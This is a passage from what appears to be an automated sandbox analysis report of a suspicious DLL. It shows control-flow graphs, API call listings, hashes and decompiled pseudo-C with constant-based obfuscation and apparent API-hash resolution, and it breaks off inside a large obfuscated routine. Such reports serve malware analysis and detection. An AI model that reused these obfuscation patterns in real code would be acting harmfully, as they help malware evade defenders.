                                                                                                                      control_flow_graph 225 10001b80-10001b90 226 10001b92-10001b97 225->226 227 10001b9c-10001ba8 225->227 228 10001c9c-10001c9f 226->228 229 10001c04-10001c66 227->229 230 10001baa-10001bb5 227->230 231 10001c74-10001c91 VirtualProtect 229->231 232 10001c68-10001c71 229->232 233 10001bb7-10001bbe 230->233 234 10001bfa-10001bff 230->234 235 10001c93-10001c95 231->235 236 10001c97 231->236 232->231 237 10001bc0-10001bce 233->237 238 10001be2-10001bf4 VirtualFree 233->238 234->228 235->228 236->228 237->238 239 10001bd0-10001be0 237->239 238->234 239->234 239->238
                                                                                                                      APIs
                                                                                                                      • VirtualFree.KERNELBASE(00000000,?,00004000,?,10001E18,00000001,00000000,?,100025E8,?,?,?,?,100025E8,00000000,00000000), ref: 10001BF4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1263568516-0
                                                                                                                      • Opcode ID: 4d31351d728c7294352f2c79f9460f06737a631568287b9c2294ba9383786da7
                                                                                                                      • Instruction ID: 18a5c97ed4e363b13208c3a7f4c71130bffb6d6a25a92aa7c7569a15449bf2a4
                                                                                                                      • Opcode Fuzzy Hash: 4d31351d728c7294352f2c79f9460f06737a631568287b9c2294ba9383786da7
                                                                                                                      • Instruction Fuzzy Hash: 7141B9746001099FEB48CF58C490FA9B7B2FB88350F14C659E91A9F395D731EE41CB84
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10036624 Relevance: 3.0, APIs: 2, Instructions: 28memoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 240 10036624-10036642 HeapCreate 241 10036647-10036654 call 100365c9 240->241 242 10036644-10036646 240->242 245 10036656-10036663 call 10035aca 241->245 246 1003667a-1003667d 241->246 245->246 249 10036665-10036678 HeapDestroy 245->249 249->242
                                                                                                                      APIs
                                                                                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000,10030AEB,00000001,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10036635
                                                                                                                      • HeapDestroy.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003666B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$CreateDestroy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3296620671-0
                                                                                                                      • Opcode ID: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                      • Instruction ID: 5adf962be877c1470e25a5b203e63be93066c2f5666ac54c72bc9e0dfe65a95a
                                                                                                                      • Opcode Fuzzy Hash: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                      • Instruction Fuzzy Hash: 22E06D706103519EFB139B30CE8A33539F8FB5878BF008869F405C80A0FBA08840AA15
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100019C0 Relevance: 2.6, APIs: 2, Instructions: 115memoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 250 100019c0-100019ee 251 10001a02-10001a0e 250->251 252 10001a14-10001a1b 251->252 253 10001b06 251->253 254 10001a83-10001a9e call 10001990 252->254 255 10001a1d-10001a2a 252->255 256 10001b0b-10001b0e 253->256 265 10001aa0-10001aa2 254->265 266 10001aa4-10001ac9 VirtualAlloc 254->266 257 10001a2c-10001a4e VirtualAlloc 255->257 258 10001a7e 255->258 260 10001a50-10001a52 257->260 261 10001a57-10001a7b call 100017c0 257->261 258->251 260->256 261->258 265->256 268 10001acb-10001acd 266->268 269 10001acf-10001afe call 10001810 266->269 268->256 269->253
                                                                                                                      APIs
                                                                                                                      • VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000257F,00000000), ref: 10001A41
                                                                                                                      • VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10012839,8B118BBC,?,1000257F,00000000,10012839,?), ref: 10001ABC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4275171209-0
                                                                                                                      • Opcode ID: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                      • Instruction ID: bcee95509f27266f5ca249dd7f6d6a0ca5035efccc592cd1fda7edfbe35d51d4
                                                                                                                      • Opcode Fuzzy Hash: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                      • Instruction Fuzzy Hash: 0D51D9B4A0010AEFDB04CF94C991AAEB7F5FF48344F248599E905AB345D770EE91CBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0018679C Relevance: 1.6, APIs: 1, Instructions: 65processCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 272 18679c-186863 call 17cf25 call 172d9f CreateProcessW
                                                                                                                      C-Code - Quality: 39%
                                                                                                                      			E0018679C(WCHAR* __ecx, void* __edx, struct _PROCESS_INFORMATION* _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, struct _STARTUPINFOW* _a36, intOrPtr _a40, intOrPtr _a48, WCHAR* _a60, int _a64) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				struct _SECURITY_ATTRIBUTES* _v20;
				intOrPtr _v24;
				void* _t40;
				int _t46;
				WCHAR* _t50;

				_push(_a64);
				_t50 = __ecx;
				_push(_a60);
				_push(0);
				_push(0);
				_push(_a48);
				_push(0);
				_push(_a40);
				_push(_a36);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0017CF25(_t40);
				_v24 = 0x639852;
				_v20 = 0;
				_v12 = 0x9647c4;
				_v12 = _v12 + 0x4343;
				_v12 = _v12 >> 0x10;
				_v12 = _v12 ^ 0x0009af77;
				_v16 = 0x17e0ca;
				_v16 = _v16 >> 4;
				_v16 = _v16 ^ 0x000f0fb4;
				_v8 = 0x429f7b;
				_v8 = _v8 + 0xffff27c2;
				_v8 = _v8 + 0xb08b;
				_v8 = _v8 ^ 0x004b6691;
				E00172D9F(0xb8601dc2, 0x1c8, __ecx, 0xa62ab78c);
				_t46 = CreateProcessW(_a60, _t50, 0, 0, _a64, 0, 0, 0, _a36, _a4); // executed
				return _t46;
			}











                                                                                                                      0x001867a4
                                                                                                                      0x001867a9
                                                                                                                      0x001867ab
                                                                                                                      0x001867ae
                                                                                                                      0x001867af
                                                                                                                      0x001867b0
                                                                                                                      0x001867b3
                                                                                                                      0x001867b4
                                                                                                                      0x001867b7
                                                                                                                      0x001867ba
                                                                                                                      0x001867bb
                                                                                                                      0x001867be
                                                                                                                      0x001867c1
                                                                                                                      0x001867c4
                                                                                                                      0x001867c7
                                                                                                                      0x001867c8
                                                                                                                      0x001867cb
                                                                                                                      0x001867cf
                                                                                                                      0x001867d0
                                                                                                                      0x001867d5
                                                                                                                      0x001867df
                                                                                                                      0x001867e2
                                                                                                                      0x001867e9
                                                                                                                      0x001867f0
                                                                                                                      0x001867f4
                                                                                                                      0x001867fb
                                                                                                                      0x00186802
                                                                                                                      0x00186806
                                                                                                                      0x0018680d
                                                                                                                      0x00186814
                                                                                                                      0x0018681b
                                                                                                                      0x00186822
                                                                                                                      0x00186842
                                                                                                                      0x0018685c
                                                                                                                      0x00186863

                                                                                                                      APIs
                                                                                                                      • CreateProcessW.KERNEL32(?,00D9A4AC,00000000,00000000,?,00000000,00000000,00000000,?,0009AF77), ref: 0018685C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 963392458-0
                                                                                                                      • Opcode ID: 1da9d84ba9731b44f90d75a5bdd1d83cf5135f1bd2c9de3e9664fac0f2fd65d2
                                                                                                                      • Instruction ID: 1fbc013cce900f83cd7f02ff89593b2fb50865d303712af86dc0cbb892a35df3
                                                                                                                      • Opcode Fuzzy Hash: 1da9d84ba9731b44f90d75a5bdd1d83cf5135f1bd2c9de3e9664fac0f2fd65d2
                                                                                                                      • Instruction Fuzzy Hash: 7921E772900248BBCF119F95CD09CDFBFB9EF99714F008148FA1466120D7B68A64EBA0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00183CBB Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 277 183cbb-183d40 call 172d9f ExitProcess
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00183CBB() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _t37;

				_v20 = _v20 & 0x00000000;
				_v24 = 0x868838;
				_v16 = 0xb6c7ac;
				_t37 = 0x79;
				_v16 = _v16 * 0x7d;
				_v16 = _v16 ^ 0x593c5b8b;
				_v8 = 0x23929;
				_v8 = _v8 | 0xd856564b;
				_v8 = _v8 << 0xd;
				_v8 = _v8 >> 1;
				_v8 = _v8 ^ 0x67f2afdd;
				_v12 = 0x42ac5b;
				_v12 = _v12 / _t37;
				_v12 = _v12 ^ 0x0009f0c4;
				E00172D9F(0x8cff02b7, 0x12e, _t37, 0xa62ab78c);
				ExitProcess(0);
			}









                                                                                                                      0x00183cc1
                                                                                                                      0x00183cc7
                                                                                                                      0x00183cce
                                                                                                                      0x00183cdb
                                                                                                                      0x00183ce2
                                                                                                                      0x00183ce5
                                                                                                                      0x00183cec
                                                                                                                      0x00183cf3
                                                                                                                      0x00183cfa
                                                                                                                      0x00183cfe
                                                                                                                      0x00183d01
                                                                                                                      0x00183d08
                                                                                                                      0x00183d19
                                                                                                                      0x00183d1c
                                                                                                                      0x00183d31
                                                                                                                      0x00183d3b

                                                                                                                      APIs
                                                                                                                      • ExitProcess.KERNELBASE(00000000), ref: 00183D3B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ExitProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 621844428-0
                                                                                                                      • Opcode ID: dd524d5e584c69c4875a986859085bb36bd1bb49e57c992e29c8257b5ff704c2
                                                                                                                      • Instruction ID: bfec132e8b7bbdc7a81c8ec8f414b8f82c45aa194c2022f6f35eb856e3456179
                                                                                                                      • Opcode Fuzzy Hash: dd524d5e584c69c4875a986859085bb36bd1bb49e57c992e29c8257b5ff704c2
                                                                                                                      • Instruction Fuzzy Hash: DE0104B6D0120CFFDB04DFE5D946A9DBBB0EB40304F508199E925AB290D7B85B54DF41
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0018FC96 Relevance: 1.3, APIs: 1, Instructions: 41stringCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 297 18fc96-18fd28 call 17cf25 call 172d9f lstrcmpiW
                                                                                                                      C-Code - Quality: 80%
                                                                                                                      			E0018FC96(void* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				void* _t32;
				int _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0017CF25(_t32);
				_v8 = 0x178fa1;
				_v8 = _v8 | 0x2f4d5c19;
				_v8 = _v8 + 0xda24;
				_t42 = 0x35;
				_v8 = _v8 / _t42;
				_v8 = _v8 ^ 0x00e923af;
				_v16 = 0xca5f26;
				_v16 = _v16 << 0xe;
				_v16 = _v16 ^ 0x97c71065;
				_v12 = 0xeb54f5;
				_v12 = _v12 >> 4;
				_v12 = _v12 ^ 0x0000b8cd;
				E00172D9F(0xb8f00729, 0x289, _t42, 0xa62ab78c);
				_t40 = lstrcmpiW(_a12, _a4); // executed
				return _t40;
			}









                                                                                                                      0x0018fc9c
                                                                                                                      0x0018fc9f
                                                                                                                      0x0018fca2
                                                                                                                      0x0018fca7
                                                                                                                      0x0018fcac
                                                                                                                      0x0018fcb6
                                                                                                                      0x0018fcbf
                                                                                                                      0x0018fccb
                                                                                                                      0x0018fcd3
                                                                                                                      0x0018fcd6
                                                                                                                      0x0018fcdd
                                                                                                                      0x0018fce4
                                                                                                                      0x0018fce8
                                                                                                                      0x0018fcef
                                                                                                                      0x0018fcf6
                                                                                                                      0x0018fcfa
                                                                                                                      0x0018fd15
                                                                                                                      0x0018fd23
                                                                                                                      0x0018fd28

                                                                                                                      APIs
                                                                                                                      • lstrcmpiW.KERNELBASE(?,0000B8CD), ref: 0018FD23
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrcmpi
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1586166983-0
                                                                                                                      • Opcode ID: bcaea3a6b408ae5b0ea271ecf45cf18554c4d7f2312cff19f50c51f1dc53bf3d
                                                                                                                      • Instruction ID: 5702fcddfe6dbf1435a8f9a093ec883ea065da46d073c2e56d9ef034c1f7e333
                                                                                                                      • Opcode Fuzzy Hash: bcaea3a6b408ae5b0ea271ecf45cf18554c4d7f2312cff19f50c51f1dc53bf3d
                                                                                                                      • Instruction Fuzzy Hash: 7701D376D00208BFDF05EFE4CD4A89EBBB6EB54304F10C098E9196A250DBB69B64DB51
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Non-executed Functions

                                                                                                                      Function 00191B54 Relevance: 28.6, Strings: 22, Instructions: 1066COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E00191B54() {
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v48;
				char _v56;
				signed int _v60;
				signed int _v72;
				intOrPtr _v76;
				char _v84;
				char _v96;
				signed int _v100;
				char _v112;
				signed int _v116;
				intOrPtr _v120;
				char _v128;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				unsigned int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				unsigned int _v216;
				unsigned int _v220;
				signed int _v224;
				signed int _v228;
				unsigned int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				unsigned int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				unsigned int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				unsigned int _v572;
				signed int _v576;
				signed int _v580;
				unsigned int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _t1099;
				signed int _t1109;
				void* _t1121;
				signed int _t1139;
				signed int _t1147;
				signed int _t1167;
				void* _t1171;
				signed int _t1172;
				signed int _t1173;
				signed int _t1174;
				signed int _t1175;
				signed int _t1176;
				signed int _t1177;
				signed int _t1178;
				signed int _t1179;
				signed int _t1180;
				signed int _t1181;
				signed int _t1182;
				signed int _t1183;
				signed int _t1184;
				signed int _t1185;
				signed int _t1186;
				signed int _t1187;
				signed int _t1272;
				signed int _t1273;
				signed int _t1279;
				void* _t1281;
				signed int _t1288;
				signed int _t1309;
				void* _t1311;
				void* _t1314;
				void* _t1315;
				void* _t1316;

				_t1311 = (_t1309 & 0xfffffff8) - 0x250;
				_v116 = _v116 & 0x00000000;
				_v120 = 0xa23e30;
				_v592 = 0x3a1cca;
				_v592 = _v592 * 0x70;
				_t1281 = 0x5cbbc19;
				_v592 = _v592 ^ 0x2f3849e0;
				_t9 =  &_v592; // 0x2f3849e0
				_t1172 = 6;
				_v592 =  *_t9 / _t1172;
				_v592 = _v592 ^ 0x090e23e8;
				_v236 = 0x87b10f;
				_v236 = _v236 << 0x10;
				_v236 = _v236 ^ 0xb10f0000;
				_v516 = 0x461834;
				_v516 = _v516 ^ 0x02f635e2;
				_t1173 = 0x21;
				_v516 = _v516 / _t1173;
				_v516 = _v516 | 0x474321ea;
				_v516 = _v516 ^ 0x4757fbfb;
				_v216 = 0xd2c0b1;
				_v216 = _v216 >> 1;
				_v216 = _v216 ^ 0x006de7f5;
				_v480 = 0xeb5e0b;
				_v480 = _v480 + 0xffffa941;
				_t1272 = 0x43;
				_v480 = _v480 / _t1272;
				_v480 = _v480 | 0xc166e67d;
				_v480 = _v480 ^ 0xc1675dee;
				_v488 = 0xe6f87d;
				_v488 = _v488 ^ 0x80ff234c;
				_v488 = _v488 ^ 0x24b1b453;
				_v488 = _v488 + 0xa7fe;
				_v488 = _v488 ^ 0xa4a91779;
				_v276 = 0x5f17b9;
				_v276 = _v276 << 3;
				_v276 = _v276 ^ 0x02fd9db5;
				_v344 = 0x4c006c;
				_v344 = _v344 >> 0xe;
				_v344 = _v344 | 0xcdf796ee;
				_v344 = _v344 ^ 0xcdf61224;
				_v200 = 0x45df15;
				_v200 = _v200 + 0x6060;
				_v200 = _v200 ^ 0x004b7917;
				_v208 = 0xca7f26;
				_v208 = _v208 ^ 0x913d6520;
				_v208 = _v208 ^ 0x91fcdbd5;
				_v588 = 0xb1f4cb;
				_v588 = _v588 + 0x6758;
				_t87 =  &_v588; // 0x6758
				_v588 =  *_t87 * 0x4f;
				_v588 = _v588 ^ 0x925d082a;
				_v588 = _v588 ^ 0xa5589431;
				_v508 = 0xf7df1e;
				_v508 = _v508 + 0xd118;
				_v508 = _v508 + 0xffffbf54;
				_v508 = _v508 + 0x17fc;
				_v508 = _v508 ^ 0x00fe0a31;
				_v380 = 0x7e02fb;
				_v380 = _v380 + 0xf589;
				_v380 = _v380 ^ 0x91d98710;
				_v380 = _v380 ^ 0x91abdaf6;
				_v504 = 0xb08a0e;
				_v504 = _v504 * 0x77;
				_t1174 = 0x77;
				_v504 = _v504 / _t1174;
				_v504 = _v504 >> 2;
				_v504 = _v504 ^ 0x002dfbde;
				_v372 = 0x813d4a;
				_t1175 = 0x6c;
				_v372 = _v372 * 0x4a;
				_v372 = _v372 / _t1175;
				_v372 = _v372 ^ 0x005da134;
				_v484 = 0x855e16;
				_v484 = _v484 ^ 0xbfb8346c;
				_t1176 = 0x5f;
				_v484 = _v484 / _t1176;
				_v484 = _v484 + 0xfcf8;
				_v484 = _v484 ^ 0x02037e81;
				_v240 = 0xec674d;
				_v240 = _v240 | 0xfc3e6c49;
				_v240 = _v240 ^ 0xfcfddb47;
				_v364 = 0x61d0f9;
				_v364 = _v364 + 0xffffb344;
				_v364 = _v364 / _t1272;
				_v364 = _v364 ^ 0x000105b5;
				_v472 = 0x31ce7b;
				_t1177 = 0x51;
				_v472 = _v472 * 0x26;
				_v472 = _v472 >> 0xc;
				_v472 = _v472 >> 3;
				_v472 = _v472 ^ 0x0004fff0;
				_v224 = 0x9583f6;
				_v224 = _v224 / _t1177;
				_v224 = _v224 ^ 0x000db43c;
				_v324 = 0x1fdef9;
				_v324 = _v324 ^ 0xa62571f8;
				_v324 = _v324 ^ 0x1b5a0dd0;
				_v324 = _v324 ^ 0xbd66a263;
				_v232 = 0xd74a0b;
				_v232 = _v232 >> 6;
				_v232 = _v232 ^ 0x0003c3e3;
				_v376 = 0x9dde1e;
				_v376 = _v376 << 4;
				_v376 = _v376 + 0x9dbb;
				_v376 = _v376 ^ 0x09d67643;
				_v172 = 0x65dbd5;
				_v172 = _v172 >> 0xf;
				_v172 = _v172 ^ 0x000c80e9;
				_v400 = 0x3c4de1;
				_v400 = _v400 ^ 0xf2f914cc;
				_t1178 = 0x12;
				_v400 = _v400 / _t1178;
				_v400 = _v400 ^ 0x0d7ab358;
				_v312 = 0x3bea2f;
				_t216 =  &_v312; // 0x3bea2f
				_t1167 = 0xc;
				_v312 =  *_t216 / _t1167;
				_v312 = _v312 + 0xffff5e93;
				_v312 = _v312 ^ 0x000042d8;
				_v392 = 0x83f9ee;
				_v392 = _v392 >> 0xb;
				_v392 = _v392 * 0x24;
				_v392 = _v392 ^ 0x00021c0f;
				_v500 = 0x95bd51;
				_v500 = _v500 ^ 0x1620baa4;
				_v500 = _v500 | 0xd04cbe8c;
				_v500 = _v500 * 0x26;
				_v500 = _v500 ^ 0xe9af68de;
				_v548 = 0x57ee13;
				_v548 = _v548 | 0xcfcc72ac;
				_v548 = _v548 << 0xe;
				_v548 = _v548 + 0x6b2a;
				_v548 = _v548 ^ 0xffb12270;
				_v300 = 0xa3111e;
				_v300 = _v300 + 0xed59;
				_v300 = _v300 | 0xdcd78075;
				_v300 = _v300 ^ 0xdcf05604;
				_v432 = 0xce194f;
				_v432 = _v432 ^ 0x23730281;
				_v432 = _v432 ^ 0x3635ea1c;
				_v432 = _v432 + 0x939b;
				_v432 = _v432 ^ 0x1587da76;
				_v288 = 0x2cf49d;
				_v288 = _v288 << 3;
				_v288 = _v288 ^ 0x016df807;
				_v584 = 0x20f3bb;
				_v584 = _v584 ^ 0x1d2fae62;
				_v584 = _v584 ^ 0x98b788a9;
				_v584 = _v584 >> 4;
				_v584 = _v584 ^ 0x0858582d;
				_v464 = 0xcbd192;
				_v464 = _v464 * 0x21;
				_v464 = _v464 + 0xffff109b;
				_v464 = _v464 | 0xd92be105;
				_v464 = _v464 ^ 0xdb61e2c2;
				_v256 = 0x6d4d8e;
				_v256 = _v256 ^ 0x2793e4ee;
				_v256 = _v256 ^ 0x27fc61d0;
				_v264 = 0x15e89c;
				_v264 = _v264 * 0x43;
				_v264 = _v264 ^ 0x05baa293;
				_v568 = 0x46d03d;
				_v568 = _v568 + 0xffffbff8;
				_v568 = _v568 << 2;
				_v568 = _v568 + 0xffff0322;
				_v568 = _v568 ^ 0x011861cf;
				_v576 = 0x876e5a;
				_v576 = _v576 >> 0x10;
				_v576 = _v576 << 2;
				_v576 = _v576 << 0xa;
				_v576 = _v576 ^ 0x000133c4;
				_v552 = 0xa4c770;
				_v552 = _v552 + 0x64e6;
				_v552 = _v552 + 0xffff80c6;
				_v552 = _v552 << 2;
				_v552 = _v552 ^ 0x029c8e96;
				_v560 = 0x48961c;
				_v560 = _v560 * 0x1d;
				_v560 = _v560 * 0x3a;
				_v560 = _v560 + 0x764e;
				_v560 = _v560 ^ 0xdceaabba;
				_v412 = 0x2483ba;
				_v412 = _v412 * 0x74;
				_v412 = _v412 >> 0xa;
				_v412 = _v412 ^ 0x000035b1;
				_v416 = 0x4a6b09;
				_v416 = _v416 >> 8;
				_v416 = _v416 * 0x64;
				_v416 = _v416 ^ 0x001bf6ce;
				_v544 = 0x85ae90;
				_v544 = _v544 + 0xffff7005;
				_v544 = _v544 + 0x7ae9;
				_t1179 = 0x70;
				_v544 = _v544 * 0x32;
				_v544 = _v544 ^ 0x1a1ce9dc;
				_v396 = 0x6298d9;
				_v396 = _v396 | 0x50e275a2;
				_v396 = _v396 ^ 0x271fbe87;
				_v396 = _v396 ^ 0x77f03e33;
				_v404 = 0x9d84c7;
				_v404 = _v404 ^ 0x3ba1d94b;
				_v404 = _v404 | 0x0d5acb53;
				_v404 = _v404 ^ 0x3f764d37;
				_v528 = 0xd0c26f;
				_v528 = _v528 + 0xffffb09d;
				_v528 = _v528 << 0xb;
				_v528 = _v528 << 4;
				_v528 = _v528 ^ 0x398aae1f;
				_v388 = 0x32973e;
				_v388 = _v388 << 2;
				_v388 = _v388 * 0x2a;
				_v388 = _v388 ^ 0x213686d9;
				_v536 = 0x39ae26;
				_v536 = _v536 << 0xf;
				_v536 = _v536 << 0xa;
				_v536 = _v536 / _t1179;
				_v536 = _v536 ^ 0x00ab5ee0;
